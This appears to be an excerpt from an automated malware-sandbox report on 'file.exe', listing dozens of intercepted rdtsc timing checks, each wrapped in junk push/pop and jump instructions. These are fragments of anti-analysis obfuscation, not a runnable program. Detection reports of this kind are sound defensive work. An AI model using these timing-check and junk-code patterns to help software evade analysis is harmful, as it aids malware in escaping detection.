                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791E0B second address: 791E10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791E10 second address: 791E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795D8F second address: 795D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795592 second address: 79559C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94C93E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79559C second address: 7955A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955A2 second address: 7955C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E3Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 je 00007FCA94C93E36h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955C3 second address: 7955C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955C8 second address: 7955DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007FCA94C93E42h 0x0000000b ja 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7465C5 second address: 7465CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A575 second address: 79A593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E3Fh 0x0000000b jp 00007FCA94C93E36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EC70 second address: 79EC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79EC76 second address: 79EC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A14E8 second address: 7A14ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A73F6 second address: 7A73FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A73FB second address: 7A740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FCA94618472h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A740F second address: 7A7415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7415 second address: 7A7448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 jmp 00007FCA94618476h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7448 second address: 7A744C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A744C second address: 7A7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A797B second address: 7A7993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7993 second address: 7A79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 js 00007FCA94618468h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCA9461846Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7EC5 second address: 7A7EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A81EA second address: 7A8208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 jng 00007FCA94618466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8208 second address: 7A8213 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FCA94C93E36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A84CC second address: 7A84DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FCA94618466h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A87D0 second address: 7A87D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A87D4 second address: 7A87E3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8DBE second address: 7A8DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8DC2 second address: 7A8DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A909E second address: 7A90A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A90A2 second address: 7A90A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC279 second address: 7AC27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC27D second address: 7AC291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FCA9461846Ch 0x0000000e jg 00007FCA94618466h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC811 second address: 7AC817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC817 second address: 7AC81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9B1B second address: 7B9B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9B24 second address: 7B9B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9B2A second address: 7B9B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9B2E second address: 7B9B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9B32 second address: 7B9B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007FCA94C93E36h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jp 00007FCA94C93E36h 0x0000001a pop edx 0x0000001b je 00007FCA94C93E3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9B55 second address: 7B9B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7BA6 second address: 7B7BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7BB7 second address: 7B7BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7BBB second address: 7B7BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCA94C93E3Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCA94C93E48h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7BED second address: 7B7C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA9461846Bh 0x00000009 jnl 00007FCA94618466h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C02 second address: 7B7C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8078 second address: 7B8098 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618475h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8098 second address: 7B80B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B80B0 second address: 7B80B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8347 second address: 7B834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B834B second address: 7B8364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8364 second address: 7B8381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA94C93E3Ah 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8381 second address: 7B83AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCA9461846Ch 0x0000000e jl 00007FCA94618466h 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007FCA94618473h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B83AE second address: 7B83B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B83B4 second address: 7B83B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9960 second address: 7B998C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA94C93E3Ch 0x00000008 jl 00007FCA94C93E52h 0x0000000e jmp 00007FCA94C93E46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7742 second address: 7B7771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jne 00007FCA94618477h 0x00000011 jmp 00007FCA94618471h 0x00000016 js 00007FCA9461846Ah 0x0000001c push eax 0x0000001d pop eax 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD94C second address: 7BD952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD952 second address: 7BD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD95B second address: 7BD961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD961 second address: 7BD98B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94618475h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA9461846Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2815 second address: 7C2819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2819 second address: 7C282E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FCA94618468h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C282E second address: 7C2847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2847 second address: 7C284B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C284B second address: 7C284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C284F second address: 7C2855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2096 second address: 7D20C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 jmp 00007FCA94C93E3Dh 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FCA94C93E36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D20C1 second address: 7D20C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D20C5 second address: 7D20DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FCA94C93E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C16 second address: 7D1C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C20 second address: 7D1C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C24 second address: 7D1C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C30 second address: 7D1C49 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FCA94C93E36h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C49 second address: 7D1C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C58 second address: 7D1C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E45h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCA94C93E36h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1C77 second address: 7D1C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1DBD second address: 7D1DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FCA94C93E3Ch 0x0000000b jnp 00007FCA94C93E36h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C19 second address: 7D5C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C1F second address: 7D5C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E47h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C40 second address: 7D5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C47 second address: 7D5C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007FCA94C93E36h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5C53 second address: 7D5C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7F83 second address: 7D7F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7F8F second address: 7D7F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D80D6 second address: 7D80F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FCA94C93E43h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D80F4 second address: 7D80FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5DC2 second address: 7E5DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5DCF second address: 7E5DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEB54 second address: 7EEB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED39E second address: 7ED3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED3B2 second address: 7ED3F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E48h 0x00000007 jmp 00007FCA94C93E48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FCA94C93E42h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED57D second address: 7ED58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCA94618466h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED58C second address: 7ED590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED590 second address: 7ED59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FCA94618466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED59C second address: 7ED5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ED9E3 second address: 7ED9ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDB39 second address: 7EDB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDCDD second address: 7EDCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDCE2 second address: 7EDD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E49h 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E42h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDD19 second address: 7EDD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EDD1F second address: 7EDD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
